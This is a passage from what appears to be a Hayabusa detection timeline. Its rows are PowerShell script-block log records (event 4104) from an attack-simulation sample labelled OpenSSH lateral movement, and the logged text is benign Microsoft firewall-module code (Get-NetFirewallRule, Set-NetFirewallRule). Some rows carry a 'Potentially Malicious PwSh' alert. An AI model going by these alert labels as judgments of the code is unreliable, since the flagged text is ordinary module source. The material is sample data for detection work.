} if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 
'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${Associ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"atedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' -Alias '*' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Par",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"atedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' -Alias '*' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Par",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
